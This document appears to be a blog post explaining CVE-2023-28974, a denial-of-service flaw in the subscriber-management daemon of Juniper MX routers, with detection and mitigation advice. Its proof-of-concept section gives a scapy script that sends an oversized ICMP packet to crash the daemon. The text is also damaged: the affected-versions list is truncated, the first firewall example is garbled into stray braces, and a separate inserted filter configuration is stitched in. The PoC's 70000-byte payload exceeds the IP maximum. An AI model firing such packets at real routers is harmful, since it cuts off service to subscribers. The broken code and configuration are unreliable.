# CVE-2023-28974 - Juniper MX Series DoS Vulnerability Explained with PoC and Protection Tips
Juniper Networks is a well-known name when it comes to high-speed networking hardware. However, even the most established vendors can have security issues. One such vulnerability is CVE-2023-28974—a flaw in Juniper Networks Junos OS running on MX Series routers involving improper input checks in the bbe-smgd (Broadband Edge Subscriber Management) daemon.
This post will help you understand what this vulnerability is, how it works, what makes it dangerous, and how you can protect your network—even if you’re not a full-time security pro. I’ll share log examples, a basic proof-of-concept (PoC), and authoritative resources.
## 1. What is CVE-2023-28974?
Imagine running a big Internet Service Provider (ISP) network where each customer, or “subscriber,” connects through a Juniper MX router. These routers use a daemon called bbe-smgd to manage all subscriber sessions (think: logging in, logging out, updating info, etc.).
In simple terms:
An attacker connected to the same layer 2 network as a subscriber—a neighbor in the same apartment building, or someone on a shared WiFi network—can send a “bad” ICMP packet to the router. If the router’s software isn’t properly checking for unusual network conditions, this malformed packet can crash the bbe-smgd process.
## 2. Who Is Affected?
According to Juniper’s advisory, any MX Series router running these Junos OS versions:

- 22.3 before 22.3R1-S2, 22.3R2
Note: Other Junos platforms or MPC (Modular Port Controllers) without bbe-smgd are not affected.
## 3. How Does the Exploit Work?
At its core, the exploit takes advantage of bad input handling. The bbe-smgd process is supposed to parse every ICMP (internet control message protocol) packet to figure out what to do. But when it receives certain odd/malformed ICMP packets, it doesn’t react gracefully—instead, it crashes.
### Example Sequence

1. Attacker connects to the same subnet as the router interface (for example, on a shared broadband connection).
2. Sends a custom/invalid ICMP packet to the router’s IP (the one handling subscribers).
3. bbe-smgd crashes upon receipt of the malformed packet.
4. Subscriber management fails—people connecting, disconnecting, or updating their sessions are impacted.
If you have traceoptions for smg-service enabled, you might see a trace entry like this:

```
BBE_TRACE(TRACE_LEVEL_INFO, "%s: Dropped unsupported ICMP PKT (src: %s, dst: %s), details: %d")
```
## 4. Proof of Concept (PoC): Malformed ICMP Packet
You can use the Python scapy library to craft a malformed ICMP packet. (Be careful! Only test in lab environments, not production.)
```python
from scapy.all import Ether, IP, ICMP, sendp

# Replace with the actual Juniper MX IP address
dst_ip = "ROUTER_IP_HERE"
# Layer 2 MAC address of router (if known), or leave for local IP handling
dst_mac = "ROUTER_MAC_HERE"

# Craft a malformed ICMP echo request (type 8, code 0) with invalid data:
# the payload is far larger than any legitimate echo request
pkt = Ether(dst=dst_mac) / IP(dst=dst_ip) / ICMP(type=8, code=0) / ("X" * 70000)  # Overly large payload

# Send the packet at layer 2 on the chosen interface (requires root)
sendp(pkt, iface="YOUR_INTERFACE_NAME", count=1)
```
- You can also experiment with invalid ICMP codes or truncated/oversized payloads.
### What’s happening?
The overlarge or invalid packet is not handled as expected. The result is a crash of the subscriber-management daemon, causing session drops and DoS.
Important: This is just a basic example. Modifying ICMP headers or payload sizes, or using fuzzing tools, can create similarly crafted packets.
## 5. Detection and Mitigation

### Detection

Enable traceoptions for the subscriber-management process so that the unsupported ICMP packets it drops are written to the trace log:

```junos
set system processes smg-service traceoptions flag all
```

- _Monitor for crashes or dropped sessions_ in bbe-smgd logs.
### Mitigation
- Upgrade your Junos OS to a safe version listed in the advisory.
- _Isolate subscriber management interfaces_—never let unauthenticated devices have direct L2 access to the router management plane.
- Use firewall filters to drop unexpected ICMP packets from the subscriber side, at the interface ingress. Example:

```junos
}
}
interfaces {
    xe-// {
    }
}
```

- (Modify `xe-//` to your actual subscriber-facing interface.)
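The filter that list item calls for, written out as an added example rather than the post’s own configuration: the ICMP types a subscriber legitimately needs are rate-limited by a policer, every other ICMP packet from the subscriber side is counted and dropped, and the filter is applied at ingress on the subscriber-facing interface. The filter, term, counter and policer names, the policer values and the interface `xe-0/0/0` are assumptions; on an MX where subscriber interfaces are created from dynamic profiles, the same filter would be referenced from the dynamic profile instead of a static interface stanza.

```junos
firewall {
    family inet {
        filter protect-bbe-smgd {
            /* ICMP types a subscriber legitimately sends, rate-limited so a flood cannot starve bbe-smgd */
            term allow-needed-icmp {
                from {
                    protocol icmp;
                    icmp-type [ echo-request echo-reply unreachable time-exceeded ];
                }
                then {
                    policer icmp-limit;
                    accept;
                }
            }
            /* Any other ICMP from the subscriber side is unexpected: count it (for monitoring) and drop it */
            term drop-other-icmp {
                from {
                    protocol icmp;
                }
                then {
                    count unexpected-icmp;
                    discard;
                }
            }
            /* Junos filters end in an implicit discard, so non-ICMP traffic must be accepted explicitly */
            term allow-rest {
                then accept;
            }
        }
    }
    /* Assumed sample values: tune to the ICMP volume your subscribers actually generate */
    policer icmp-limit {
        if-exceeding {
            bandwidth-limit 1m;
            burst-size-limit 15k;
        }
        then discard;
    }
}
interfaces {
    /* xe-0/0/0 is an assumed placeholder: substitute the real subscriber-facing interface */
    xe-0/0/0 {
        unit 0 {
            family inet {
                filter {
                    input protect-bbe-smgd;
                }
            }
        }
    }
}
```

The `count` action lets you watch the dropped traffic with `show firewall filter protect-bbe-smgd`, which is a cheap way to spot a subscriber sending unexpected ICMP before bbe-smgd is affected.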
---
## 6. Official Reference and Additional Reading
- Juniper Official Advisory (JSA70120)
- NVD entry for CVE-2023-28974
- Juniper Junos Security Advisories
---
## 7. Conclusion
CVE-2023-28974 is a serious issue for ISPs, campus networks, and anyone providing layer 2 broadband access with Juniper MX Series routers. The flaw is easy to exploit, requires no authentication, and directly impacts customer connectivity.
How to stay safe:
- Patch immediately to secure Junos versions.
- Use network segmentation and firewall rules to protect management interfaces.
- Monitor for unusual session drops or daemon crashes.
Stay vigilant, keep your software up to date, and share awareness with your networking team. You can stop this vulnerability from being a problem in your network!
---
*If you found this helpful, feel free to share or check back for more deep dives into network vulnerabilities!*
Timeline
Published on: 04/17/2023 22:15:00 UTC
Last modified on: 04/18/2023 03:15:00 UTC